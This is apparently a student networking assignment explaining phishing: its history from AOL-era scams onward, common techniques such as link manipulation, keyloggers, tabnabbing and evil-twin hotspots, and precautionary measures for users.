INTRODUCTION
Phishing refers to the
process where a targeted individual is contacted by email or
telephone by someone posing as a legitimate institution to lure the
individual into providing sensitive information such as banking information,
credit card details, and passwords. The personal information is then used
to access the individual’s account and can result in identity theft and
financial loss.
Phishing is typically carried out by e-mail spoofing
or instant messaging, and it often directs users to enter details at a fake
website whose look and feel are almost identical to the legitimate one.
Phishing is an example of social engineering techniques used to deceive users,
and exploits the poor usability of current web security technologies.
HISTORY OF PHISHING
The first time that the term
“phishing” was used and recorded was on January 2, 1996. The mention occurred
in a Usenet newsgroup called alt.online-service.america-online. Although
phishing scams originated sometime around the year 1995, they did not become
commonly known by everyday people until nearly ten years later. A phishing
technique was described in detail, in a paper and presentation delivered to the
International HP Users Group, Interex.
The first way in which phishers
conducted attacks was by using algorithms to create randomized credit card
numbers. The random credit card numbers were used to open AOL accounts. Those
accounts were then used to spam other users and for a wide range of other
things. This practice was put to an end by AOL in 1995, when the company
created security measures to prevent the successful use of randomly generated
credit card numbers.
With their random credit card
number generating racket shut down, phishers created what would become a very
common and enduring set of techniques. Through the AOL instant messenger and
email systems, they would send messages to users while posing as AOL employees.
Those messages would request users to verify their accounts or to confirm their
billing information.
THE
EVOLUTION OF PHISHING
Phishing hasn’t changed a lot since its AOL heyday.
In 2001, phishers turned their attention
to online payment systems. Although the first attack, which was on E-Gold in
June 2001, was not considered to be successful, it planted an important seed.
In late 2003, phishers registered dozens of domains that suggested legitimate
sites like eBay and PayPal. They used email worm programs to send out spoofed
emails to PayPal customers. Those customers were led to spoofed sites and asked
to update their credit card information and other identifying information. By
the beginning of 2004, phishers were riding a huge wave of success that
included attacks on banking sites and their customers. Popup windows were used
to acquire sensitive information from victims. Since that time, many other
sophisticated methods have been developed.
PHISHING TECHNIQUES
1) Email
/ Spam
Phishers may send the same email to millions
of users, requesting them to fill in personal details. These details will be
used by the phishers for their illegal activities. Phishing with email and spam
is a very common phishing scam. Most of the messages have an urgent note which
requires the user to enter credentials to update account information, change
details, and verify accounts. Sometimes, they may be asked to fill out a form
to access a new service through a link which is provided in the email.
2) Web
Based Delivery
Web based delivery is one of the most sophisticated
phishing techniques. Also known as “man-in-the-middle,” the hacker is located
in between the original website and the phishing system. The phisher traces
details during a transaction between the legitimate website and the user. As
the user continues to pass information, it is gathered by the phishers, without
the user knowing about it.
3)Instant Messaging
Instant messaging is the method in which the user
receives a message with a link directing them to a fake phishing website
which has the same look and feel as the legitimate website. If the user doesn’t
look at the URL, it may be hard to tell the difference between the fake and
legitimate websites. Then, the user is asked to provide personal information on
the page.
4)Trojan Hosts
Trojan hosts are invisible hackers trying to log
into your user account to collect credentials through the local machine. The
acquired information is then transmitted to phishers.
5)Link Manipulation
Link manipulation is the technique in which the
phisher sends a link to a website. When the user clicks on the deceptive link,
it opens up the phisher’s website instead of the website mentioned in the link.
One of the anti-phishing techniques used to prevent link manipulation is to
move the mouse over the link to view the actual address.
6)Key Loggers
Key loggers refer to the malware used to identify
inputs from the keyboard. The information is sent to the hackers who will
decipher passwords and other types of information. To prevent key loggers from
accessing personal information, secure websites provide options to use mouse
click to make entries through the virtual keyboard.
7)Session Hacking
In session hacking, the phisher exploits the web
session control mechanism to steal information from the user. In a simple
session hacking procedure known as session sniffing, the phisher can use a
sniffer to intercept relevant information so that he or she can access the Web
server illegally.
8)System Reconfiguration
Phishers may send a message whereby the user is
asked to reconfigure the settings of the computer. The message may come from a
web address which resembles a reliable source.
9)Content Injection
Content injection is the technique where the
phisher changes a part of the content on the page of a reliable website. This
is done to mislead the user to go to a page outside the legitimate website
where the user is asked to enter personal information.
10)Phishing through Search Engines
Some phishing scams involve search engines where
the user is directed to products sites which may offer low cost products or
services. When the user tries to buy the product by entering the credit card
details, it’s collected by the phishing site. There are many fake bank websites
offering credit cards or loans to users at a low rate but they are actually
phishing sites.
11)Phone Phishing
In phone phishing, the phisher makes phone calls to
the user and asks the user to dial a number. The purpose is to get personal
information of the bank account through the phone. Phone phishing is mostly
done with a fake caller ID.
12)Malware Phishing
Phishing scams involving malware require it to be
run on the user’s computer. The malware is usually attached to the email sent
to the user by the phishers. Once you click on the link, the malware will start
functioning. Sometimes, the malware may also be attached to downloadable
files.
Phishers take advantage of the vulnerability of web
security services to gain sensitive information which is used for fraudulent
purposes. This is why it’s always a good idea to learn about the various
phishing techniques, including phishing with Trojans and Spyware.
RECENT
ADVANCEMENTS IN PHISHING
1)Tabnabbing
Tabnabbing
is a computer exploit and phishing attack, which persuades users to submit
their login details and passwords to popular Web sites by impersonating those
sites and convincing the user that the site is genuine. The attack takes
advantage of user trust and inattention to detail in regard to tabs, and the
ability of modern web pages to rewrite tabs and their contents a long time
after the page is loaded. The exploit employs scripts to rewrite a page of
average interest with an impersonation of a well-known website, when left
unattended for some time. A user who returns after a while and sees the
rewritten page may be induced to believe the page is legitimate and enter their
login, password and other details.
A practical implementation of Tabnabbing can be
found in this webpage : http://isis.poly.edu/~eitan/tn-poc/goog.html
2) Evil twin
Evil twin
is a term for a rogue Wi-Fi access point that appears to be a legitimate one
offered on the premises, but actually has been set up by a hacker to eavesdrop
on wireless communications among Internet surfers. An attacker fools wireless
users into connecting a laptop or mobile phone to a tainted hotspot by posing
as a legitimate provider.
Wireless devices link to the
Internet via "hotspots" – nearby connection points that they lock on
to. But these hotspots can act like an open door to thieves. Anyone with suitable
equipment can locate a hotspot and take its place, substituting their own
"evil twin".
This type of evil twin attack may be used by a hacker to steal the passwords of
unsuspecting users by either snooping the communication link or by phishing,
which involves setting up a fraudulent Web site and luring people there.
PRECAUTIONARY MEASURES
AGAINST PHISHING
Although complete prevention is virtually
impossible, mentioned below are some logical precautionary measures that both
consumers and corporations can take in an attempt to reduce the potential of
being conned by phishing scams.
1.
Never Click on Hyperlinks within emails
Hyperlinks within emails are often cloaked, or
hidden. The text you see as a hyperlink may not be where the hyperlink takes
you. If you are unsure of the source of the email, you should not click on
hyperlinks within emails that are apparently from a legitimate company.
Instead, directly type in the URL in the Internet browser address bar, or call
the company on a contact number previously verified or known to be genuine.
2.
Use Anti-SPAM Filter Software
Some studies have shown around 85% of all email sent
is SPAM, with a majority fraudulent. This can be costly and time consuming to
end users who receive them. Effective SPAM filters can reduce the number of
fraudulent and malicious emails consumers are exposed to.
3.
Use Anti-Virus Software
To protect against Trojan and worm attacks,
anti-virus software can detect and delete virus files before they can attack a
computer. It is important to keep all anti-virus software up to date with
vendor updates. These virus programs can search your computer for personally
sensitive information and pass this information to fraudsters.
4.
Use a Personal Firewall
Firewall's can monitor both incoming and outgoing
Internet traffic from a computer. This can protect the computer from being
hacked into, and a virus being planted, and can also block unauthorized
programs from accessing the Internet, such as Trojans, worms and spyware.
5.
Keep Software Updated (Operating Systems & Browsers)
Fraudsters and malicious computer hackers are
continually finding vulnerabilities in software operating systems and Internet
Browsers. Software vendors are constantly updating their software to fix these
vulnerabilities and protect consumers.
6.
Always look for "https" and a padlock on a site that requests
personal information
Information entered on an Internet Web Site can be
intercepted by a third party. Web Sites that are secure protect against this
activity. When submitting sensitive financial and personal information on the
Internet, look for the locked padlock on the Internet browser's status bar or
the “https://” at the start of the URL in the address bar.
7.
Keep your Computer clean from Spyware
Spyware & Adware are files that can be installed
on your computer, even if you don't want them, without you knowing they are
there! They allow companies to monitor your Internet browsing patterns, see
what you purchase and even allow companies to inundate you with those annoying
"pop up" ads!
8.
Educate Yourself on Fraudulent Activity on the Internet
Internet Fraud methods are evolving at a rapid rate.
Consumers need to be aware they are vulnerable as fraudsters are persuasive and
convincing; many victims thought they were too smart to be scammed. Consumers
should educate themselves on Internet Fraud, the trends and continual changes
in fraudulent methods used.
This was my Data communication and Networking Assignment.
References :